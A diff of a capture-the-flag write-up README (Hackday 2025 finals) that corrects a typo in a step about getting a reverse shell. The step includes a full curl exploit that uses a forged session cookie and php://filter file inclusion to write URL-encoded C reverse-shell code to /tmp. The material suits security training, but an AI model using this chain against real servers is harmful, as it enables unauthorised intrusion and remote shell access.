Ax8457/WriteUPs/Hackday2025_finals/TheHearthOfGearford/README.md

 <h2> Step 3: Launch a revshell to get a stable prompt and perform a privesc to read the flag </h2>

-<p align="justify"> Once the webshell was deployed and commands could have been ran on the machine, the final step was to laucnh a revshell to get a stable prompt to finally escalate privileges an read the flag.
+<p align="justify"> Once the webshell was deployed and commands could have been run on the machine, the final step was to laucnh a revshell to get a stable prompt to finally escalate privileges an read the flag.
 To do so, the solution was to use libc because netcat was missing and it was a docker so no /dev/tcp folder too.
 To get a revshell the payload must have been url encoded and sent to server.
 The payload below can write the reverse shell available under revshell.c in this repo, in the /tmp folder :</p>

 ````bash
 curl -b "session_token=eyd1c2VybmFtZSc6J2d1ZXN0JywgJ3JvbGUnOidhZG1pbid9./3b1GSdZghQ6flLq0yEjz5fDtnXbRcBItrm20FCyAoI=" http://ip/HiddenAdministrativeControlPanel.php?load=php%3A%2F%2Ffilter%2Fconvert.base64-decode%2Fresource%3Duserloginfail.txt&cmd=echo%20%27%23include%20%3Cstdio.h%3E%0A%23include%20%3Csys%2Fsocket.h%3E%0A%23include%20%3Cnetinet%2Fin.h%3E%0A%23include%20%3Carpa%2Finet.h%3E%0A%23include%20%3Cstring.h%3E%0A%23include%20%3Cunistd.h%3E%0A%0A%23define%20IP%20%22127.0.0.1%22%0A%23define%20PORT%2014456%0A%0Aint%20main%28%29%0A%7B%0A%20%20%20%20int%20sockfd%20%3D%20socket%28AF_INET%2C%20SOCK_STREAM%2C%200%29%3B%0A%0A%20%20%20%20struct%20sockaddr_in%20server_addr%3B%0A%20%20%20%20server_addr.sin_family%20%3D%20AF_INET%3B%0A%20%20%20%20server_addr.sin_port%20%3D%20htons%28PORT%29%3B%0A%0A%20%20%20%20inet_pton%28AF_INET%2C%20IP%2C%20%26%28server_addr.sin_addr%29%29%3B%0A%0A%20%20%20%20connect%28sockfd%2C%20%28struct%20sockaddr%20%2A%29%26server_addr%2C%20sizeof%28server_addr%29%29%3B%0A%0A%20%20%20%20dup2%28sockfd%2C%200%29%3B%0A%20%20%20%20dup2%28sockfd%2C%201%29%3B%0A%20%20%20%20dup2%28sockfd%2C%202%29%3B%0A%0A%20%20%20%20execve%28%22%2Fbin%2Fsh%22%2C%200%2C%200%29%3B%0A%0A%20%20%20%20close%28sockfd%29%3B%0A%0A%20%20%20%20return%200%3B%0A%7D%27%20%3E%20%2Ftmp%2Frev2.c%09